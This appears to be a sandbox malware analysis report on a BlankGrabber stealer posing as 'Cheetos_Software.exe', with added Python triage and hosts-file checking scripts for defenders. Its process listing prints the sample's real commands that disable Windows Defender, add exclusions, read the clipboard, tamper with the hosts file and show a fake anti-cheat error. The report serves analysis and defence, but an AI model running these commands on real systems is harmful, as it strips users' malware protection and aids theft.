Malware Analysis Report

2024-11-13 13:58

Sample ID 240407-ywk6nsdb9s
Target Cheetos_Software.exe
SHA256 d8b6347bd3c847455f6befbe29d412cfe44054fe9893d81a3adc32c64d9e2251
Tags
blankgrabber spyware stealer upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

d8b6347bd3c847455f6befbe29d412cfe44054fe9893d81a3adc32c64d9e2251

Threat Level: Known bad

The file Cheetos_Software.exe was found to be: Known bad.

Malicious Activity Summary

blankgrabber spyware stealer upx

A stealer written in Python and packaged with Pyinstaller

Blankgrabber family

Drops file in Drivers directory

Executes dropped EXE

Reads user/profile data of web browsers

UPX packed file

Loads dropped DLL

Looks up external IP address via web service

Accesses cryptocurrency files/wallets, possible credential harvesting

Enumerates physical storage devices

Detects videocard installed

Suspicious use of SendNotifyMessage

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Gathers system information

Enumerates processes with tasklist

Suspicious use of FindShellTrayWindow

Checks SCSI registry key(s)

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: GetForegroundWindowSpam

Views/modifies file attributes

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-04-07 20:08

Signatures

A stealer written in Python and packaged with Pyinstaller

Description Indicator Process Target
N/A N/A N/A N/A

Blankgrabber family

blankgrabber
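The two static1 signatures above (a Python stealer packaged with PyInstaller, plus the upx tag) can be reproduced offline without running the sample. The check below is an added example written for this report, not code from the sandbox or from the BlankGrabber project: it looks for the PyInstaller CArchive cookie that one-file builds append to the bootloader (magic MEI\014\013\012\013\016, followed by package length, TOC offset, TOC length, the Python version the bootloader expects, and the Python DLL name) and for the UPX0/UPX1 section names and "UPX!" tag that UPX leaves behind. The buffer built by build_sample() is a constructed stand-in carrying only those markers, not the real Cheetos_Software.exe.

```python
import struct

# PyInstaller one-file binaries append a CArchive to the bootloader; the archive ends
# with a fixed-size cookie that starts with this magic (PyInstaller/archive/readers.py).
PYINSTALLER_MAGIC = b"MEI\x0c\x0b\x0a\x0b\x0e"
# Cookie layout used by PyInstaller >= 2.1, big-endian: magic, package length,
# TOC offset, TOC length, Python version, name of the Python shared library.
COOKIE_FMT = "!8sIIii64s"
COOKIE_SIZE = struct.calcsize(COOKIE_FMT)  # 88 bytes

# Section names UPX creates plus the "UPX!" tag it writes into the packed header.
UPX_MARKERS = (b"UPX0", b"UPX1", b"UPX!")


def find_pyinstaller_cookie(data: bytes):
    """Return the parsed cookie if `data` is a PyInstaller one-file archive, else None."""
    # Search from the end: older bootloaders embed the same 8 bytes in their own code,
    # so the real cookie is the last occurrence, not the first.
    pos = data.rfind(PYINSTALLER_MAGIC)
    if pos < 0 or pos + COOKIE_SIZE > len(data):
        return None
    _magic, pkg_len, toc_off, toc_len, pyver, pylib = struct.unpack(
        COOKIE_FMT, data[pos:pos + COOKIE_SIZE])
    # pyver is written as e.g. 311 for 3.11; very old builds used two digits (27, 36)
    major, minor = divmod(pyver, 100) if pyver >= 100 else divmod(pyver, 10)
    return {
        "cookie_offset": pos,
        "package_length": pkg_len,
        "toc_offset": toc_off,
        "toc_length": toc_len,
        "python_version": f"{major}.{minor}",
        "python_lib": pylib.rstrip(b"\x00").decode("ascii", "replace"),
    }


def find_upx_markers(data: bytes):
    """Return the UPX markers present in `data` (empty tuple when none)."""
    return tuple(m for m in UPX_MARKERS if m in data)


def triage(data: bytes):
    """Combine both checks into the two tags the sandbox assigned: upx and pyinstaller."""
    cookie = find_pyinstaller_cookie(data)
    upx = find_upx_markers(data)
    tags = []
    if upx:
        tags.append("upx")
    if cookie:
        tags.append("pyinstaller")
    return {"tags": tags, "pyinstaller": cookie, "upx_markers": upx}


def build_sample():
    """Constructed stand-in for a UPX-packed PyInstaller one-file EXE (not the real sample).

    Only the markers the checks look for are modelled; there is no valid PE structure here.
    """
    fake_pe = (b"MZ" + b"\x00" * 62 + b"PE\x00\x00"
               + b"UPX0" + b"\x00" * 36 + b"UPX1" + b"\x00" * 36)
    archive_body = b"\x00" * 256  # stands in for the CArchive entries
    cookie = struct.pack(COOKIE_FMT, PYINSTALLER_MAGIC,
                         len(archive_body) + COOKIE_SIZE,  # package length includes the cookie
                         200, 56, 311, b"python311.dll")
    return fake_pe + archive_body + cookie


if __name__ == "__main__":
    import sys
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample()
    print(triage(blob))
```

Two caveats when running this on a real file: if UPX compressed the overlay as well as the sections, the cookie is inside the compressed data and the file has to be unpacked (upx -d) before the PyInstaller check can see it; and the Python version in the cookie is what decides which bytecode tooling (pyinstxtractor plus a matching decompiler) will work on the extracted .pyc files, which is why it is worth reading before extraction rather than guessing.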

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-07 20:08

Reported

2024-04-07 20:11

Platform

win10v2004-20240226-en

Max time kernel

149s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe"

Signatures

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Windows\system32\attrib.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Windows\system32\attrib.exe N/A
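The three hosts-file events above line up with the attrib -r / attrib +r commands and the REG QUERY of Tcpip\Parameters DataBasePath in the Processes listing further down: the sample locates the hosts file from the registry, strips the read-only attribute, writes to it, and restores the attribute. The report does not record what was written, so the response-side check is to parse the file and list every active mapping that is not the stock localhost entry. The code below is an added example for this report, not sandbox or BlankGrabber code; the domains in SAMPLE_HOSTS are constructed placeholders, not entries recovered from the sample, and the /etc/hosts fallback exists only so the parser can be exercised off a Windows box.

```python
import ipaddress
import os
import sys


def hosts_path():
    """Locate the hosts file the way the sample did: via the DataBasePath registry value."""
    if sys.platform == "win32":
        import winreg
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,
                            r"SYSTEM\CurrentControlSet\Services\Tcpip\Parameters") as key:
            base, _kind = winreg.QueryValueEx(key, "DataBasePath")  # REG_EXPAND_SZ
        return os.path.join(os.path.expandvars(base), "hosts")
    return "/etc/hosts"  # same file format on Unix; lets the example run anywhere


def parse_hosts(text):
    """Return (line_no, ip, hostname) for every active mapping in hosts-file text."""
    entries = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()  # strip full-line and inline comments
        if not line:
            continue
        parts = line.split()
        try:
            ip = ipaddress.ip_address(parts[0])
        except ValueError:
            continue  # first token is not an address; the resolver skips the line too
        for host in parts[1:]:
            entries.append((n, ip, host.lower()))
    return entries


def suspicious_entries(text, expected_hosts=("localhost",)):
    """Flag every mapping that is not expected, classed as sinkhole (to loopback/0.0.0.0) or redirect."""
    findings = []
    for n, ip, host in parse_hosts(text):
        if host in expected_hosts:
            continue
        kind = "sinkhole" if (ip.is_loopback or ip.is_unspecified) else "redirect"
        findings.append({"line": n, "host": host, "ip": str(ip), "kind": kind})
    return findings


# Constructed hosts file: the stock Microsoft header (comments only) plus the kind of
# lines a stealer adds. The domains are placeholders, not entries taken from the sample.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#    127.0.0.1       localhost
#    ::1             localhost
0.0.0.0 av-vendor.example www.av-vendor.example
127.0.0.1 analysis-site.example   # comment after the entry
10.0.0.5 update.example
not-an-address entry.example
"""


def check_file(path=None):
    """Read the live hosts file (or `path`) and return its suspicious entries."""
    with open(path or hosts_path(), encoding="utf-8", errors="replace") as fh:
        return suspicious_entries(fh.read())


if __name__ == "__main__":
    for finding in suspicious_entries(SAMPLE_HOSTS):
        print(finding)
```

A stock Windows hosts file contains only comments, so on a clean host check_file() returns an empty list; anything it returns after this sample has run is either a sinkholed security/update domain (loopback or 0.0.0.0) or a redirect to an attacker-chosen address, and the line number tells the responder exactly what to remove before restoring the read-only attribute.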

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\_MEI34842\rar.exe N/A

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target Count
N/A N/A N/A N/A 54

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\system32\taskmgr.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target Count
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A 29
N/A N/A C:\Windows\system32\taskmgr.exe N/A 35

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target Count
N/A N/A C:\Windows\system32\taskmgr.exe N/A 64

Suspicious use of SendNotifyMessage

Description Indicator Process Target Count
N/A N/A C:\Windows\system32\taskmgr.exe N/A 64

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3484 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe
PID 3484 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe
PID 2000 wrote to memory of 2760 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 2000 wrote to memory of 2760 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 2000 wrote to memory of 3476 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 2000 wrote to memory of 3476 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 2000 wrote to memory of 3136 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 2000 wrote to memory of 3136 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 2000 wrote to memory of 4248 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 2000 wrote to memory of 4248 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 4248 wrote to memory of 4856 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4248 wrote to memory of 4856 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2000 wrote to memory of 4136 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 2000 wrote to memory of 4136 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 2000 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 2000 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 2760 wrote to memory of 956 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2760 wrote to memory of 956 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2000 wrote to memory of 720 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\tree.com
PID 2000 wrote to memory of 720 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\tree.com
PID 3136 wrote to memory of 2080 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mshta.exe
PID 3136 wrote to memory of 2080 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mshta.exe
PID 2000 wrote to memory of 4928 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 2000 wrote to memory of 4928 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 2000 wrote to memory of 2288 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 2000 wrote to memory of 2288 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 2528 wrote to memory of 3640 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 2528 wrote to memory of 3640 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 2000 wrote to memory of 3292 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 2000 wrote to memory of 3292 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 2000 wrote to memory of 5116 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 2000 wrote to memory of 5116 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 2000 wrote to memory of 1488 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 2000 wrote to memory of 1488 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 4136 wrote to memory of 3300 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 4136 wrote to memory of 3300 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 2000 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 2000 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 3476 wrote to memory of 3748 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3476 wrote to memory of 3748 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2288 wrote to memory of 4088 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 2288 wrote to memory of 4088 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 720 wrote to memory of 1292 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 720 wrote to memory of 1292 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 3292 wrote to memory of 3212 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 3292 wrote to memory of 3212 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 2572 wrote to memory of 4260 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2572 wrote to memory of 4260 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4928 wrote to memory of 3404 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4928 wrote to memory of 3404 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5116 wrote to memory of 5064 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\DllHost.exe
PID 5116 wrote to memory of 5064 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\DllHost.exe
PID 1488 wrote to memory of 5100 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1488 wrote to memory of 5100 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2000 wrote to memory of 3508 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 2000 wrote to memory of 3508 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 2000 wrote to memory of 3648 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 2000 wrote to memory of 3648 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 3508 wrote to memory of 1100 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 3508 wrote to memory of 1100 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 3648 wrote to memory of 1248 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 3648 wrote to memory of 1248 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 2000 wrote to memory of 3492 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe
PID 2000 wrote to memory of 3492 N/A C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe C:\Windows\system32\cmd.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe

"C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe"

C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe

"C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('External software found (Error code 0x100000675)', 0, 'Easy Anti Cheat', 0+16);close()""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\    ‎.scr'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\    ‎.scr'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"

C:\Windows\system32\mshta.exe

mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('External software found (Error code 0x100000675)', 0, 'Easy Anti Cheat', 0+16);close()"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "systeminfo"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand [encoded command not preserved in this copy of the report]"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\System32\Wbem\WMIC.exe

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand [encoded command not preserved in this copy of the report]

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\systeminfo.exe

systeminfo

C:\Windows\system32\reg.exe

REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\attrib.exe

attrib -r C:\Windows\System32\drivers\etc\hosts

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\attrib.exe

attrib +r C:\Windows\System32\drivers\etc\hosts

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\pkckntpt\pkckntpt.cmdline"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

